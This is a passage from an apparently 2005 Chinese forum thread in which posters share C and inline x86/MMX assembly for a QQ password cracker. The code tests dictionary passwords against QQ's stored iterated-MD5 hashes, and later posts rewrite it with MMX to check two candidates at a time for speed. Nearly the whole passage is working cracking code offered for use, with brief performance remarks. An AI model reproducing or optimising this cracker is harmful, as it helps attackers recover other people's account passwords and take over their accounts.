        __asm lea a,[tmp2+a+ac] \
        __asm add a,x \
        __asm rol a,s \
        __asm add a,b

///////////////////////////////////////
// QQ解密正式开始
//////////////////////////////////////
//作者:冲出宇宙
//2005,11,1
//////////////////////////////////////
UI8 MD5Result[16];        //md5加密后的结果
UI32 LoopNum;                //循环次数
UI32 QQNum;                //qq号码
UI32 PwdNum;                //已经对多少个字符串进行了检查
CString Pwd;                //当前正确的密码
CString FileQQ,FilePwd;        //密码文件和密码字典文件

DWORD DecodeThreadId;       
HANDLE DecodeThreadHandle;        //解密线程

CQQDecoderCtrl *Me;

//密码是否正确
bool IsPasswordCorrect(char* sPwd)
{
        UI32 x[16];
        UI32 a0;
        a0 = strlen(sPwd);
        memset(x,0,64);
        memcpy(x,sPwd,a0);
        x[14] = a0*8;
        ((UI8*)x)[a0] = 0x80;
        {
                __asm pushad;
                {
                        __asm {
                                //initial
                                        mov a,0x67452301
                                        mov b,0xefcdab89
                                        mov c,0x98badcfe
                                        mov d,0x10325476
                        }
                       
                        /* Round 1 */
                        FF(a, b, c, d, x( 0), S11, 0xd76aa478); /* 1 */
                        FF(d, a, b, c, x( 1), S12, 0xe8c7b756); /* 2 */
                        FF(c, d, a, b, x( 2), S13, 0x242070db); /* 3 */
                        FF(b, c, d, a, x( 3), S14, 0xc1bdceee); /* 4 */
                        FF(a, b, c, d, x( 4), S11, 0xf57c0faf); /* 5 */
                        FF(d, a, b, c, x( 5), S12, 0x4787c62a); /* 6 */
                        FF(c, d, a, b, x( 6), S13, 0xa8304613); /* 7 */
                        FF(b, c, d, a, x( 7), S14, 0xfd469501); /* 8 */
                        FF(a, b, c, d, x( 8), S11, 0x698098d8); /* 9 */
                        FF(d, a, b, c, x( 9), S12, 0x8b44f7af); /* 10 */
                        FF(c, d, a, b, x(10), S13, 0xffff5bb1); /* 11 */
                        FF(b, c, d, a, x(11), S14, 0x895cd7be); /* 12 */
                        FF(a, b, c, d, x(12), S11, 0x6b901122); /* 13 */
                        FF(d, a, b, c, x(13), S12, 0xfd987193); /* 14 */
                        FF(c, d, a, b, x(14), S13, 0xa679438e); /* 15 */
                        FF(b, c, d, a, x(15), S14, 0x49b40821); /* 16 */
                       
                        /* Round 2 */
                        GG (a, b, c, d, x( 1), S21, 0xf61e2562); /* 17 */
                        GG (d, a, b, c, x( 6), S22, 0xc040b340); /* 18 */
                        GG (c, d, a, b, x(11), S23, 0x265e5a51); /* 19 */
                        GG (b, c, d, a, x( 0), S24, 0xe9b6c7aa); /* 20 */
                        GG (a, b, c, d, x( 5), S21, 0xd62f105d); /* 21 */
                        GG (d, a, b, c, x(10), S22,  0x2441453); /* 22 */
                        GG (c, d, a, b, x(15), S23, 0xd8a1e681); /* 23 */
                        GG (b, c, d, a, x( 4), S24, 0xe7d3fbc8); /* 24 */
                        GG (a, b, c, d, x( 9), S21, 0x21e1cde6); /* 25 */
                        GG (d, a, b, c, x(14), S22, 0xc33707d6); /* 26 */
                        GG (c, d, a, b, x( 3), S23, 0xf4d50d87); /* 27 */
                        GG (b, c, d, a, x( 8), S24, 0x455a14ed); /* 28 */
                        GG (a, b, c, d, x(13), S21, 0xa9e3e905); /* 29 */
                        GG (d, a, b, c, x( 2), S22, 0xfcefa3f8); /* 30 */
                        GG (c, d, a, b, x( 7), S23, 0x676f02d9); /* 31 */
                        GG (b, c, d, a, x(12), S24, 0x8d2a4c8a); /* 32 */
                       
                        /* Round 3 */
                        HH (a, b, c, d, x( 5), S31, 0xfffa3942); /* 33 */
                        HH (d, a, b, c, x( 8), S32, 0x8771f681); /* 34 */
                        HH (c, d, a, b, x(11), S33, 0x6d9d6122); /* 35 */
                        HH (b, c, d, a, x(14), S34, 0xfde5380c); /* 36 */
                        HH (a, b, c, d, x( 1), S31, 0xa4beea44); /* 37 */
                        HH (d, a, b, c, x( 4), S32, 0x4bdecfa9); /* 38 */
                        HH (c, d, a, b, x( 7), S33, 0xf6bb4b60); /* 39 */
                        HH (b, c, d, a, x(10), S34, 0xbebfbc70); /* 40 */
                        HH (a, b, c, d, x(13), S31, 0x289b7ec6); /* 41 */
                        HH (d, a, b, c, x( 0), S32, 0xeaa127fa); /* 42 */
                        HH (c, d, a, b, x( 3), S33, 0xd4ef3085); /* 43 */
                        HH (b, c, d, a, x( 6), S34,  0x4881d05); /* 44 */
                        HH (a, b, c, d, x( 9), S31, 0xd9d4d039); /* 45 */
                        HH (d, a, b, c, x(12), S32, 0xe6db99e5); /* 46 */
                        HH (c, d, a, b, x(15), S33, 0x1fa27cf8); /* 47 */
                        HH (b, c, d, a, x( 2), S34, 0xc4ac5665); /* 48 */
                       
                        /* Round 4 */
                        II (a, b, c, d, x( 0), S41, 0xf4292244); /* 49 */
                        II (d, a, b, c, x( 7), S42, 0x432aff97); /* 50 */
                        II (c, d, a, b, x(14), S43, 0xab9423a7); /* 51 */
                        II (b, c, d, a, x( 5), S44, 0xfc93a039); /* 52 */
                        II (a, b, c, d, x(12), S41, 0x655b59c3); /* 53 */
                        II (d, a, b, c, x( 3), S42, 0x8f0ccc92); /* 54 */
                        II (c, d, a, b, x(10), S43, 0xffeff47d); /* 55 */
                        II (b, c, d, a, x( 1), S44, 0x85845dd1); /* 56 */
                        II (a, b, c, d, x( 8), S41, 0x6fa87e4f); /* 57 */
                        II (d, a, b, c, x(15), S42, 0xfe2ce6e0); /* 58 */
                        II (c, d, a, b, x( 6), S43, 0xa3014314); /* 59 */
                        II (b, c, d, a, x(13), S44, 0x4e0811a1); /* 60 */
                        II (a, b, c, d, x( 4), S41, 0xf7537e82); /* 61 */
                        II (d, a, b, c, x(11), S42, 0xbd3af235); /* 62 */
                        II (c, d, a, b, x( 2), S43, 0x2ad7d2bb); /* 63 */
                        II (b, c, d, a, x( 9), S44, 0xeb86d391); /* 64 */
                       
                        __asm {
                                        mov [x],0x67452301;
                                        mov [x+4],0xefcdab89;
                                        mov [x+8],0x98badcfe;
                                        mov [x+12],0x10325476;
                                        add [x],a;
                                        add [x+4],b;
                                        add [x+8],c;
                                        add [x+12],d;
                        }
                        __asm popad;
                }
        }
        memset(x+16,0,48);
        x[4] = 0x80;
        x[14] = 0x80;

        //主要轮次
        for(UI32 i=1;i<LoopNum;i++)       
        {
                __asm pushad;
                {
                        __asm {
                                //initial
                                        mov a,0x67452301
                                        mov b,0xefcdab89
                                        mov c,0x98badcfe
                                        mov d,0x10325476
                        }

                        /* Round 1 */
                        FF(a, b, c, d, x( 0), S11, 0xd76aa478); /* 1 */
                        FF(d, a, b, c, x( 1), S12, 0xe8c7b756); /* 2 */
                        FF(c, d, a, b, x( 2), S13, 0x242070db); /* 3 */
                        FF(b, c, d, a, x( 3), S14, 0xc1bdceee); /* 4 */
                        FF(a, b, c, d, x( 4), S11, 0xf57c0faf); /* 5 */
                        FF(d, a, b, c, x( 5), S12, 0x4787c62a); /* 6 */
                        FF(c, d, a, b, x( 6), S13, 0xa8304613); /* 7 */
                        FF(b, c, d, a, x( 7), S14, 0xfd469501); /* 8 */
                        FF(a, b, c, d, x( 8), S11, 0x698098d8); /* 9 */
                        FF(d, a, b, c, x( 9), S12, 0x8b44f7af); /* 10 */
                        FF(c, d, a, b, x(10), S13, 0xffff5bb1); /* 11 */
                        FF(b, c, d, a, x(11), S14, 0x895cd7be); /* 12 */
                        FF(a, b, c, d, x(12), S11, 0x6b901122); /* 13 */
                        FF(d, a, b, c, x(13), S12, 0xfd987193); /* 14 */
                        FF(c, d, a, b, x(14), S13, 0xa679438e); /* 15 */
                        FF(b, c, d, a, x(15), S14, 0x49b40821); /* 16 */
                       
                        /* Round 2 */
                        GG (a, b, c, d, x( 1), S21, 0xf61e2562); /* 17 */
                        GG (d, a, b, c, x( 6), S22, 0xc040b340); /* 18 */
                        GG (c, d, a, b, x(11), S23, 0x265e5a51); /* 19 */
                        GG (b, c, d, a, x( 0), S24, 0xe9b6c7aa); /* 20 */
                        GG (a, b, c, d, x( 5), S21, 0xd62f105d); /* 21 */
                        GG (d, a, b, c, x(10), S22,  0x2441453); /* 22 */
                        GG (c, d, a, b, x(15), S23, 0xd8a1e681); /* 23 */
                        GG (b, c, d, a, x( 4), S24, 0xe7d3fbc8); /* 24 */
                        GG (a, b, c, d, x( 9), S21, 0x21e1cde6); /* 25 */
                        GG (d, a, b, c, x(14), S22, 0xc33707d6); /* 26 */
                        GG (c, d, a, b, x( 3), S23, 0xf4d50d87); /* 27 */
                        GG (b, c, d, a, x( 8), S24, 0x455a14ed); /* 28 */
                        GG (a, b, c, d, x(13), S21, 0xa9e3e905); /* 29 */
                        GG (d, a, b, c, x( 2), S22, 0xfcefa3f8); /* 30 */
                        GG (c, d, a, b, x( 7), S23, 0x676f02d9); /* 31 */
                        GG (b, c, d, a, x(12), S24, 0x8d2a4c8a); /* 32 */
                       
                        /* Round 3 */
                        HH (a, b, c, d, x( 5), S31, 0xfffa3942); /* 33 */
                        HH (d, a, b, c, x( 8), S32, 0x8771f681); /* 34 */
                        HH (c, d, a, b, x(11), S33, 0x6d9d6122); /* 35 */
                        HH (b, c, d, a, x(14), S34, 0xfde5380c); /* 36 */
                        HH (a, b, c, d, x( 1), S31, 0xa4beea44); /* 37 */
                        HH (d, a, b, c, x( 4), S32, 0x4bdecfa9); /* 38 */
                        HH (c, d, a, b, x( 7), S33, 0xf6bb4b60); /* 39 */
                        HH (b, c, d, a, x(10), S34, 0xbebfbc70); /* 40 */
                        HH (a, b, c, d, x(13), S31, 0x289b7ec6); /* 41 */
                        HH (d, a, b, c, x( 0), S32, 0xeaa127fa); /* 42 */
                        HH (c, d, a, b, x( 3), S33, 0xd4ef3085); /* 43 */
                        HH (b, c, d, a, x( 6), S34,  0x4881d05); /* 44 */
                        HH (a, b, c, d, x( 9), S31, 0xd9d4d039); /* 45 */
                        HH (d, a, b, c, x(12), S32, 0xe6db99e5); /* 46 */
                        HH (c, d, a, b, x(15), S33, 0x1fa27cf8); /* 47 */
                        HH (b, c, d, a, x( 2), S34, 0xc4ac5665); /* 48 */
                       
                        /* Round 4 */
                        II (a, b, c, d, x( 0), S41, 0xf4292244); /* 49 */
                        II (d, a, b, c, x( 7), S42, 0x432aff97); /* 50 */
                        II (c, d, a, b, x(14), S43, 0xab9423a7); /* 51 */
                        II (b, c, d, a, x( 5), S44, 0xfc93a039); /* 52 */
                        II (a, b, c, d, x(12), S41, 0x655b59c3); /* 53 */
                        II (d, a, b, c, x( 3), S42, 0x8f0ccc92); /* 54 */
                        II (c, d, a, b, x(10), S43, 0xffeff47d); /* 55 */
                        II (b, c, d, a, x( 1), S44, 0x85845dd1); /* 56 */
                        II (a, b, c, d, x( 8), S41, 0x6fa87e4f); /* 57 */
                        II (d, a, b, c, x(15), S42, 0xfe2ce6e0); /* 58 */
                        II (c, d, a, b, x( 6), S43, 0xa3014314); /* 59 */
                        II (b, c, d, a, x(13), S44, 0x4e0811a1); /* 60 */
                        II (a, b, c, d, x( 4), S41, 0xf7537e82); /* 61 */
                        II (d, a, b, c, x(11), S42, 0xbd3af235); /* 62 */
                        II (c, d, a, b, x( 2), S43, 0x2ad7d2bb); /* 63 */
                        II (b, c, d, a, x( 9), S44, 0xeb86d391); /* 64 */
                       
                        __asm {
                                mov [x],0x67452301;
                                mov [x+4],0xefcdab89;
                                mov [x+8],0x98badcfe;
                                mov [x+12],0x10325476;
                                add [x],a;
                                add [x+4],b;
                                add [x+8],c;
                                add [x+12],d;
                        }
                }
                __asm popad;

        }
        if(memcmp(MD5Result,x,16) == 0)        return true;
        return false;
}

有一点很重要的就是,vc好像不主动优化汇编代码。
速度上没有改观的主要原因可能是因为x数组的数据没有保存到寄存器中。
考虑到x[5-13]=0,以及x[4]=x[14]=0x80,如果把x[0-3]保存到mmx空间,我估计时间上肯定能好不少。
2005-11-1 15:05
0
雪    币: 229
活跃值: (70)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
10
看不懂~~~~~~~~  
2005-11-1 17:58
0
雪    币: 235
活跃值: (190)
能力值: ( LV12,RANK:210 )
在线值:
发帖
回帖
粉丝
11
工作了半天,终于写出了基于mmx的代码。并且使用了一些技巧。比如,
F(x,y,z) = (x and y) or ( not(x) and z) 可以修改为:
f(x,y,z) = ((y xor z) and x) xor z
同时,每次比较2个密码。这点利用了mmx是64位的特性。不过,难以执信的是,代码速度的提速没有预计的那么明显。明天再探讨这个问题。今天困了。

代码如下:
//Md5算法
typedef unsigned char UI8;
typedef char I8;
typedef unsigned long UI32;
//mm0,mm1,mm2,mm3保存有2个md5变换的a,b,c,d值
//a0和a1都保存在这里
#define a mm0
//b0,b1
#define b mm1
//c0,c1
#define c mm2
//d0,d1
#define d mm3

//m0,m1,m2,m3是第一个数据
//m4,m5,m6,m7是第二个数据
#define m2 eax
#define m6 ebx
#define m3 ecx
#define m7 edx
//m0,m4 保存在mm4
//m1,m5 保存在mm5

//把ac(32)复制2个到mm7(64)中去
#define Move(ac) \
        __asm mov esi,ac \
        __asm movd mm6,esi \
        __asm movd mm7,esi \
        __asm psll mm6,32 \
        __asm por mm7,mm6

//把data(32)复制2个到a0(64)中去
#define Move0(a0,data) \
        __asm mov esi,data \
        __asm movd a0,esi \
        __asm movd mm7,esi \
        __asm psll a0,32 \
        __asm por a0,mm7

#define F(x,y,z) \
        __asm movq mm6,y \
        __asm pxor mm6,z \
        __asm pand mm6,x \
        __asm pxor mm6,z

#define G(x,y,z) \
        __asm movq mm6,x \
        __asm pxor mm6,y \
        __asm pand mm6,z \
        __asm pxor mm6,y

#define H(x,y,z) \
        __asm movq mm6,x \
        __asm pxor mm6,y \
        __asm pxor mm6,z

#define I(x,y,z) \
__asm movd mm6,edi \
__asm movd mm7,edi \
__asm psllq mm6,32 \
__asm pxor mm6,mm7 \
__asm pxor mm6,z \
__asm por mm6,x \
__asm pxor mm6,y

//当x数组数据为0或者0x80时,有x[4]=0x80,x[14]=0x80,x[5-13,15]=0;
//ac 为普通的2个32位组成
//s0 + s1 = 32,因为没有循环左移位
#define md5_FF0(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
F(b0,c0,d0) \
__asm paddd a0,mm7 \
__asm paddd a0,mm6 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

//当x数组数据不为0时
//调用第一个数据
#define md5_FF1(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
F(b0,c0,d0) \
__asm paddd a0,mm6 \
__asm paddd mm7,mm4 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0
//第二个数据
#define md5_FF2(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
F(b0,c0,d0) \
__asm paddd mm7,mm5 \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0
//第三个数据
#define md5_FF3(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
F(b0,c0,d0) \
__asm paddd mm7,mm6 \
__asm paddd a0,mm7 \
__asm movd mm6,eax \
__asm movd mm7,ebx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0
//第四个数据
#define md5_FF4(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
F(b0,c0,d0) \
__asm paddd mm7,mm6 \
__asm paddd a0,mm7 \
__asm movd mm6,ecx \
__asm movd mm7,edx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

//为0
#define md5_GG0(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
G(b0,c0,d0) \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0
//当x数组数据不为0时
#define md5_GG1(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
G(b0,c0,d0) \
__asm paddd mm7,mm4 \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_GG2(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
G(b0,c0,d0) \
__asm paddd mm7,mm5 \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_GG3(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
G(b0,c0,d0) \
__asm paddd mm7,mm6 \
__asm paddd a0,mm7 \
__asm movd mm6,eax \
__asm movd mm7,ebx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_GG4(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
G(b0,c0,d0) \
__asm paddd mm7,mm6 \
__asm paddd a0,mm7 \
__asm movd mm6,ecx \
__asm movd mm7,edx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

//为0
#define md5_HH0(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
H(b0,c0,d0) \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0
//当x数组数据不为0时
#define md5_HH1(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
H(b0,c0,d0) \
__asm paddd mm7,mm4 \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_HH2(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
H(b0,c0,d0) \
__asm paddd mm7,mm5 \
__asm paddd a0,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_HH3(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
H(b0,c0,d0) \
__asm paddd mm7,mm6 \
__asm paddd a0,mm7 \
__asm movd mm6,eax \
__asm movd mm7,ebx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_HH4(a0,b0,c0,d0,s0,s1,ac) \
Move(ac) \
H(b0,c0,d0) \
__asm paddd mm7,mm6 \
__asm paddd a0,mm7 \
__asm movd mm6,ecx \
__asm movd mm7,edx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

//为0
#define md5_II0(a0,b0,c0,d0,s0,s1,ac)\
I(b0,c0,d0) \
__asm paddd a0,mm6 \
Move(ac) \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0
//当x数组数据不为0时
#define md5_II1(a0,b0,c0,d0,s0,s1,ac) \
I(b0,c0,d0) \
__asm paddd a0,mm6 \
Move(ac) \
__asm paddd mm7,mm4 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_II2(a0,b0,c0,d0,s0,s1,ac) \
I(b0,c0,d0) \
__asm paddd a0,mm6 \
Move(ac) \
__asm paddd mm7,mm5 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_II3(a0,b0,c0,d0,s0,s1,ac) \
I(b0,c0,d0) \
__asm paddd a0,mm6 \
Move(ac) \
__asm paddd a0,mm7 \
__asm movd mm6,eax \
__asm movd mm7,ebx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_II4(a0,b0,c0,d0,s0,s1,ac) \
I(b0,c0,d0) \
__asm paddd a0,mm6 \
Move(ac) \
__asm paddd a0,mm7 \
__asm movd mm6,ecx \
__asm movd mm7,edx \
__asm psll mm6,32 \
__asm por mm7,mm6 \
__asm paddd a0,mm7 \
__asm movq mm7,a0 __asm psrld a0,s0 __asm pslld mm7,s1 __asm por a0,mm7 \
__asm paddd a0,b0

#define md5_S11 25
#define md5_S12 20
#define md5_S13 15
#define md5_S14 10
#define md5_S21 27
#define md5_S22 23
#define md5_S23 18
#define md5_S24 12
#define md5_S31 28
#define md5_S32 21
#define md5_S33 16
#define md5_S34 9
#define md5_S41 26
#define md5_S42 22
#define md5_S43 17
#define md5_S44 11
//以下数据和上面数据对应的和为32
#define md5_S110 7
#define md5_S120 12
#define md5_S130 17
#define md5_S140 22
#define md5_S210 5
#define md5_S220 9
#define md5_S230 14
#define md5_S240 20
#define md5_S310 4
#define md5_S320 11
#define md5_S330 16
#define md5_S340 23
#define md5_S410 6
#define md5_S420 10
#define md5_S430 15
#define md5_S440 21

///////////////////////////////////////
// QQ解密正式开始
//////////////////////////////////////
//作者:冲出宇宙
//2005,11,2
//////////////////////////////////////
UI8 MD5Result[16];        //md5加密后的结果
UI32 LoopNum;                //循环次数
UI32 QQNum;                        //qq号码
UI32 PwdNum;                //已经对多少个字符串进行了检查
CString Pwd;                //当前正确的密码
CString FileQQ,FilePwd;        //密码文件和密码字典文件

DWORD DecodeThreadId;       
HANDLE DecodeThreadHandle;        //解密线程

CQQDecoderCtrl *Me;

//密码是否正确,每次测试2个密码
int IsPasswordCorrect(char* sPwd0,char* sPwd1)
{
        UI32 i,dataIn0[4],dataIn1[4];
        MD5 md5;
        //第一轮
        md5.Hash((UI8*)dataIn0,(UI8*)sPwd0,strlen(sPwd0));
        md5.Hash((UI8*)dataIn1,(UI8*)sPwd1,strlen(sPwd1));

        __asm pushad;
        //准备输入数据
        __asm
        {
                //1: mm4
                mov esi,[dataIn0];
                mov edi,[dataIn1];
                movd mm4,esi;
                movd mm6,edi;
                psll mm4,32;
                por mm4,mm6;
                //2: mm5
                mov esi,[dataIn0+4];
                mov edi,[dataIn1+4];
                movd mm5,esi;
                movd mm6,edi;
                psll mm5,32;
                por mm5,mm6;
                //3: eax:ebx
                mov eax,[dataIn0+8];
                mov ebx,[dataIn1+8];
                //4: ecx:edx
                mov ecx,[dataIn0+12];
                mov edx,[dataIn1+12];
                //5: mov esi,0xffffffff
                xor edi,edi;
                not edi;
        }
        //主要轮次
        __asm
        {
                push ebp;
                mov ebp,LoopNum;
        }
Begin:
        __asm
        {
                dec ebp;
                cmp ebp,0;
                je End;
               
                Move0(a,0x67452301);
                Move0(b,0xefcdab89);
                Move0(c,0x98badcfe);
                Move0(d,0x10325476);
               
                md5_FF1 (a, b, c, d,  md5_S11, md5_S110,0xd76aa478);
                md5_FF2 (d, a, b, c,  md5_S12,  md5_S120,0xe8c7b756);
                md5_FF3 (c, d, a, b,  md5_S13, md5_S130,0x242070db);
                md5_FF4 (b, c, d, a,  md5_S14, md5_S140,0xc1bdceee);
                md5_FF0 (a, b, c, d,  md5_S11,  md5_S110,0xf57c102f);
                md5_FF0 (d, a, b, c, md5_S12, md5_S120,0x4787c62a);
                md5_FF0 (c, d, a, b, md5_S13, md5_S130,0xa8304613);
                md5_FF0 (b, c, d, a, md5_S14, md5_S140,0xfd469501);
                md5_FF0 (a, b, c, d, md5_S11,md5_S110, 0x698098d8);
                md5_FF0 (d, a, b, c, md5_S12, md5_S120,0x8b44f7af);
                md5_FF0 (c, d, a, b, md5_S13,  md5_S130,0xffff5bb1);
                md5_FF0 (b, c, d, a, md5_S14, md5_S140,0x895cd7be);
                md5_FF0 (a, b, c, d, md5_S11, md5_S110,0x6b901122);
                md5_FF0 (d, a, b, c, md5_S12, md5_S120,0xfd987193);
                md5_FF0 (c, d, a, b,md5_S13, md5_S130,0xa679440e);
                md5_FF0 (b, c, d, a, md5_S14,  md5_S140,0x49b40821);

                md5_GG2 (a, b, c, d,md5_S21, md5_S210,0xf61e2562);
                md5_GG0 (d, a, b, c, md5_S22, md5_S220,0xc040b340);
                md5_GG0 (c, d, a, b, md5_S23, md5_S230,0x265e5a51);
                md5_GG1 (b, c, d, a,md5_S24, md5_S240,0xe9b6c7aa);
                md5_GG0 (a, b, c, d, md5_S21, md5_S210,0xd62f105d);
                md5_GG0 (d, a, b, c, md5_S22, md5_S220, 0x2441453);
                md5_GG0 (c, d, a, b, md5_S23, md5_S230,0xd8a1e681);
                md5_GG0 (b, c, d, a, md5_S24, md5_S240,0xe7d3fc48);
                md5_GG0 (a, b, c, d, md5_S21, md5_S210,0x21e1cde6);
                md5_GG0 (d, a, b, c, md5_S22, md5_S220,0xc3370856);
                md5_GG4 (c, d, a, b,md5_S23, md5_S230,0xf4d50d87);
                md5_GG0 (b, c, d, a, md5_S24, md5_S240,0x455a14ed);
                md5_GG0 (a, b, c, d, md5_S21, md5_S210,0xa9e3e905);
                md5_GG3 (d, a, b, c,md5_S22, md5_S220,0xfcefa3f8);
                md5_GG0 (c, d, a, b, md5_S23, md5_S230,0x676f02d9);
                md5_GG0 (b, c, d, a, md5_S24,md5_S240, 0x8d2a4c8a);

                md5_HH0 (a, b, c, d, md5_S31, md5_S310,0xfffa3942);
                md5_HH0 (d, a, b, c, md5_S32, md5_S320,0x8771f681);
                md5_HH0 (c, d, a, b, md5_S33, md5_S330,0x6d9d6122);
                md5_HH0 (b, c, d, a, md5_S34, md5_S340,0xfde5388c);
                md5_HH2 (a, b, c, d,md5_S31, md5_S310,0xa4beea44);
                md5_HH0 (d, a, b, c, md5_S32, md5_S320,0x4bded029);
                md5_HH0 (c, d, a, b, md5_S33, md5_S330,0xf6bb4b60);
                md5_HH0 (b, c, d, a, md5_S34, md5_S340,0xbebfbc70);
                md5_HH0 (a, b, c, d, md5_S31, md5_S310,0x289b7ec6);
                md5_HH1 (d, a, b, c,md5_S32, md5_S320,0xeaa127fa);
                md5_HH4 (c, d, a, b,md5_S33, md5_S330,0xd4ef3085);
                md5_HH0 (b, c, d, a, md5_S34, md5_S340, 0x4881d05);
                md5_HH0 (a, b, c, d, md5_S31, md5_S310,0xd9d4d039);
                md5_HH0 (d, a, b, c, md5_S32, md5_S320,0xe6db99e5);
                md5_HH0 (c, d, a, b, md5_S33, md5_S330,0x1fa27cf8);
                md5_HH3 (b, c, d, a,md5_S34, md5_S340,0xc4ac5665);
       
                       
                md5_II1 (a, b, c, d,md5_S41, md5_S410,0xf4292244);
                md5_II0 (d, a, b, c, md5_S42,  md5_S420,0x432aff97);
                md5_II0 (c, d, a, b, md5_S43, md5_S430,0xab942427);
                md5_II0 (b, c, d, a, md5_S44, md5_S440,0xfc93a039);
                md5_II0 (a, b, c, d, md5_S41, md5_S410,0x655b59c3);
                md5_II4 (d, a, b, c,md5_S42, md5_S420,0x8f0ccc92);
                md5_II0 (c, d, a, b, md5_S43, md5_S430,0xffeff47d);
                md5_II2 (b, c, d, a, md5_S44, md5_S440,0x85845dd1);
                md5_II0 (a, b, c, d, md5_S41, md5_S410,0x6fa87e4f);
                md5_II0 (d, a, b, c, md5_S42, md5_S420,0xfe2ce6e0);
                md5_II0 (c, d, a, b, md5_S43,md5_S430, 0xa3014314);
                md5_II0 (b, c, d, a, md5_S44, md5_S440,0x4e0811a1);
                md5_II0 (a, b, c, d, md5_S41,md5_S410, 0xf7537f02);
                md5_II0 (d, a, b, c, md5_S42,md5_S420, 0xbd3af235);
                md5_II3 (c, d, a, b, md5_S43, md5_S430, 0x2ad7d2bb);
                md5_II0 (b, c, d, a, md5_S44, md5_S440,0xeb86d391);
                Move0(mm4,0x67452301);
                __asm paddd mm4,a;
                Move0(mm5,0xefcdab89);
                __asm paddd mm5,b;
                Move0(mm6,0x98badcfe);
                __asm paddd mm6,c;
                __asm movd ebx,mm6;
                __asm psrl mm6,32;
                __asm movd eax,mm6;
                Move0(mm6,0x10325476);
                __asm paddd mm6,d;
                __asm movd edx,mm6;
                __asm psrl mm6,32;
                __asm movd ecx,mm6;
                    __asm jmp Begin;
        }
End:
        //输出数据
        __asm
        {
                pop ebp;
                //1:mm4
                movd esi,mm4;
                mov [dataIn1],esi;
                psrl mm4,32;
                movd esi,mm4;
                mov [dataIn0],esi;
                //2:mm5
                movd esi,mm5;
                mov [dataIn1+4],esi;
                psrl mm5,32;
                movd esi,mm5;
                mov [dataIn0+4],esi;
                //3:eax:ebx
                mov [dataIn0+8],eax;
                mov [dataIn1+8],ebx;
                //4:ecx:edx
                mov [dataIn0+12],ecx;
                mov [dataIn1+12],edx;
                emms;
        }
        __asm popad;

        if(memcmp(MD5Result,dataIn0,16) == 0)        return 1;
        if(memcmp(MD5Result,dataIn1,16) == 0)        return 2;
        return 3;
}
2005-11-2 00:58
0
雪    币: 671
活跃值: (723)
